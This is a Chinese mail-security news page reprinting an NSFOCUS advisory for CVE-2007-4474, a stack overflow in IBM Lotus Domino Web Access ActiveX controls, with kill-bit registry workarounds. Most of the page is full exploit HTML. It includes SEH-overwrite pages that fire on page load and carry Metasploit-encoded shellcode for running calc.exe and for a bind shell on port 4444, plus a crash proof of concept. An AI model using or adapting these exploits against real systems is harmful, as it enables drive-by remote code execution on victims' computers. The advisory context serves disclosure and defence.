首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

邮件网络安全

系统安全 | 邮件软件漏洞 | 攻防技术 | 安全基础 | 病毒公告 | 病毒查杀 | Forefront/TMG/ISA | 防火墙 | 数字签名 |
首页 > 邮件网络安全 > 邮件软件漏洞 > IBM Lotus Domino Web Access上传溢出漏洞 > 正文

IBM Lotus Domino Web Access上传溢出漏洞

出处:绿盟科技 作者:绿盟科技 时间:2008-1-14 0:01:42
发布日期:2007-12-20
更新日期:2007-12-24

受影响系统:
IBM Lotus Domino Web Access dwa7W.dll 7.0.34.1
IBM Lotus Domino Web Access 7.x
描述:
BUGTRAQ  ID: 26972
CVE(CAN) ID: CVE-2007-4474

IBM Lotus Domino Web Access是Lotus Domino服务器基于web的消息和协作界面。

IBM Lotus Domino Web Access的dwa7.dwa7.1 ActiveX控件(dwa7W.dll)在处理传送给General_ServerName属性的参数时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户客户端。

如果为该属性分配了超长的字符串然后调用了InstallBrowserHelperDll()方式的话,就会触发这个溢出,导致执行任意指令。

<*来源:Elazar Broad (elazarb@earthlink.net
  
  链接:http://secunia.com/advisories/28184/
        http://marc.info/?l=full-disclosure&m=119819116326545&w=2
        http://www.kb.cert.org/vuls/id/963889
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-----------------
<!--
written by e.b.
IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite
Exploit
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6w.dll
version 6.0.48.0
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
  <title>IBM Domino Web Access Upload Module inotes6w.dll SEH
Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
     var buf = unescape("%u4141");
     while (buf.length <= 2461) buf = buf + unescape("%u4141");

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
                          
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +
                          
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +
                          
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +
                          
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +
                          
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +
                          
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +
                          
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +
                          
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +
                          
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +
                          
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +
                          
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +
                          
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +
                          
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +
                          
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +
                          
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +
                          
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +
                          
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +
                          
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +
                          
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +
                          
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +
                          
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +
                          
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +
                          
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +
                          
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +
                          
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +
                          
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +
                          
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +
                          
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
                          
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +
                          
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +
                          
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +
                          
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +
                          
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +
                          
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +
                          
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +
                          
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +
                          
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +
                          
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +
                          
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +
                          
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +
                          
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
                          "%u684f%u3956%u386f%u4350");

                var next_seh_pointer = unescape("%u06EB%u9090"); //2 byte jump
                
                //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
                    //no SafeSEH
                var seh_handler = unescape("%u6950%u74C9");
        
                var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");

                var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;
                
                obj.General_ServerName = m;
                    obj.InstallBrowserHelperDll();

   }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
     Unable to create object
    </object>
</body>
</html>

-----------------


---------------------
<!--
written by e.b.
IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, dwa7w.dll
version 7.0.34.1
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
  <title>IBM Domino Web Access Upload Module dwa7w.dll SEH
Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
     var buf = unescape("%u4141");
     while (buf.length <= 2461) buf = buf + unescape("%u4141");

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
                          
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +
                          
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +
                          
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +
                          
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +
                          
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +
                          
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +
                          
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +
                          
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +
                          
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +
                          
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +
                          
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +
                          
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +
                          
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +
                          
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +
                          
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +
                          
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +
                          
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +
                          
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +
                          
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +
                          
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +
                          
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +
                          
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +
                          
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +
                          
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +
                          
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +
                          
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +
                          
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +
                          
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
                          
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +
                          
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +
                          
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +
                          
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +
                          
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +
                          
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +
                          
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +
                          
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +
                          
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +
                          
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +
                          
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +
                          
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +
                          
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
                          "%u684f%u3956%u386f%u4350");

                var next_seh_pointer = unescape("%u06EB%u9090"); //2 byte jump
                
                //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
                    //no SafeSEH
                var seh_handler = unescape("%u6950%u74C9");
        
                var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");

                var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;
                
                obj.General_ServerName = m;
                    obj.InstallBrowserHelperDll();

   }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:E008A543-CEFB-4559-912F-
C27C2B89F13B">
     Unable to create object
    </object>
</body>
</html>

---------------------


<!--
written by e.b.
-->
<html>
<head>
  <script language="JavaScript" DEFER>
   function Check() {
     var s = 'A';

    while (s.length <= 12000) s = s + 'A';

    obj.General_ServerName = s;
    obj.InstallBrowserHelperDll();
  
   }
  </script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html>

<html>
<head>
  <title>IBM Domino Web Access Upload Module inotes6.dll SEH
Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
     var buf = 'A';
     while (buf.length <= 3119) buf = buf + 'A';

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +
                          
"%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +
                          
"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +
                          
"%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +
                          
"%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +
                          
"%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +
                          
"%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +
                          
"%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +
                          
"%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +
                          
"%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +
                          
"%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +
                          
"%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +
                          
"%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +
                          
"%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +
                          
"%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +
                          
"%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +
                          
"%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +
                          
"%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +
                          
"%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +
                          
"%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +
                          
"%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +
                          
"%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +
                          
"%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +
                          
"%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +
                          
"%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +
                          
"%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
                          
"%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +
                          
"%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +
                          
"%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +
                          
"%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +
                          
"%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +
                          
"%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +
                          
"%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +
               &nbs, p;          
"%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +
                          
"%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +
                          
"%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +
                          
"%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +
                          
"%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +
                          
"%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +
                          
"%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +
                          
"%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
                          "%4f%68%56%39%6f%38%50%43");

                var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
                
                //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
                //no SafeSEH
                var seh_handler = unescape("%50%69%C9%74");
        
                var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

                var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;
                
                obj.General_ServerName = m;
                obj.InstallBrowserHelperDll();

   }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
     Unable to create object
    </object>
</body>
</html>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在IE中禁用Domino Web Access ActiveX控件,为以下CLSID设置kill bit:

      {3BFFE033-BF43-11d5-A271-00A024A51325}
      {E008A543-CEFB-4559-912F-C27C2B89F13B}

或将以下文本保持为.REG文件并导入:

      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3BFFE033-BF43-11d5-A271-00A024A51325}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E008A543-CEFB-4559-912F-C27C2B89F13B}]
      "Compatibility Flags"=dword:00000400

厂商补丁:

IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ers.ibm.com/
相关文章 热门文章
  • 自定义 Outlook Web App (OWA) 2010的登录和注销页
  • 实现微软AD与Domino OA系统的互连互用
  • Ipswitch IMail Server邮件列表imailsrv.exe栈溢出漏洞
  • Ipswitch IMail Server imailsrv.exe远程栈溢出漏洞
  • Exim邮件目录硬链接处理本地权限提升漏洞
  • SquirrelMail IMAP登录请求拒绝服务漏洞
  • Microsoft Outlook Online模式远程堆溢出漏洞(MS10-064)
  • IBM Lotus Domino iCalendar邮件地址解析栈溢出漏洞
  • AXIGEN Mail Server远程跨站脚本和目录遍历漏洞
  • Python smtpd模块SMTPChannel类竞争条件拒绝服务漏洞
  • Novell GroupWise Internet Agent组件Content-Type多个值解析栈溢出漏洞
  • Novell GroupWise Internet Agent组件Content-Type字符串解析缓冲区溢出漏洞
  • Exchange Server 2003 中的弱点会导致权限提升
  • 更安全稳定!快下载微软ISA 2000 SP2
  • MDaemon 7.2发现权限提升漏洞
  • Exchange 2003 Server发布新补丁KB883543
  • 微软发布关于Exchange漏洞紧急公告
  • MS05-021:Exchange Server漏洞远程执行代码
  • WebAdmin 3.0.2 跨站脚本、HTML注入安全漏洞
  • Imail Server IMAP EXAMINE命令缓冲区溢出漏洞
  • Open WebMail Email存在头字段HTML代码注入漏洞
  • 微软发布关于Exchange 5.5 漏洞更新公告
  • IMail 8.13远程DELETE命令缓冲区溢出漏洞
  • MS04-035:SMTP中安全漏洞可能允许执行远程代码
  • 自由广告区
     
    最新软件下载
  • SharePoint Server 2010 部署文档
  • Exchange 2010 RTM升级至SP1 教程
  • Exchange 2010 OWA下RBAC实现的组功能...
  • Lync Server 2010 Standard Edition 标..
  • Lync Server 2010 Enterprise Edition...
  • Forefront Endpoint Protection 2010 ...
  • Lync Server 2010 Edge 服务器部署文档
  • 《Exchange 2003专家指南》
  • Mastering Hyper-V Deployment
  • Windows Server 2008 R2 Hyper-V
  • Microsoft Lync Server 2010 Unleashed
  • Windows Server 2008 R2 Unleashed
  • 今日邮件技术文章
  • 腾讯,在创新中演绎互联网“进化论”
  • 华科人 张小龙 (中国第二代程序员 QQ...
  • 微软推出新功能 提高Hotmail密码安全性
  • 快压技巧分享:秒传邮件超大附件
  • 不容忽视的邮件营销数据分析过程中的算..
  • 国内手机邮箱的现状与未来发展——访尚..
  • 易观数据:2011Q2中国手机邮箱市场收入..
  • 穿越时空的爱恋 QQ邮箱音视频及贺卡邮件
  • Hotmail新功能:“我的朋友可能被黑了”
  • 入侵邻居网络发骚扰邮件 美国男子被重..
  • 网易邮箱莫子睿:《非你莫属》招聘多过..
  • 中国电信推广189邮箱绿色账单
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号